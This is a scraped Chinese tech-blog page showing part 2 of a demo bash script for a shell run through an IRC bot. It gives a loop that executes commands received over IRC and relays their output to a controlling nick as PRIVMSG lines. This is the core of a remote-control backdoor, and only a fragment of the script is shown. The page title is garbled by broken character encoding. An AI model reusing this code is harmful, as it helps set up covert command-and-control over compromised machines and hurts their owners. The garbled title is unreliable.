您现在的位置:主页 > 技术中心 > 操作系统 > Linux

ò???irc botμ?shellêμ??(demo)(2)

来源:未知 责任编辑:责任编辑 发表时间:2015-09-16 20:04 点击:

34                 #update cwd if this is a "cd" command 

35                 echo $cmd | egrep "(^ ?*cd *)|(^ ?*pwd$)" >/dev/null 2>&1 

36                 test $? -eq 0 && cmd="echo [+]Pwd is now $cwd"

37                 #overwirte the "pwd" command 

38                 cd $cwd;$cmd 2>&1| sed "s/^/PRIVMSG $mgr :/" | tee -a $tmpfile >/dev/null 2>&1 

39                 echo "[+] Complete" | sed "s/^/PRIVMSG $mgr :/" >> $tmpfile 

40                 #exec it and send 

41 done

 

 

\

 

from£oTm3yShell7's Blog

发表评论
请自觉遵守互联网相关的政策法规,严禁发布色情、暴力、反动的言论。
评价:
表情:
用户名: 验证码:点击我更换图片

推荐热点

  • /etc/fstab 详解
  • nginx主主集群
  •  LVS-NAT和LVS-DR模式的实现详解
  •  RHCE考试之磁盘配额
  • 学习笔记:ACL详解
  •  LVM逻辑卷管理器
  • suse linux双网卡双网关配置
  •  Nginx主主负载均衡架构
  • linux top命令详解

快速直达

?? - ?? - ÝřŝžľŘÝź - TAGąęÇŠ - RSSśŠÔÄ - ??
Copyright © 2004-2024 上海卓卓网络科技有限公司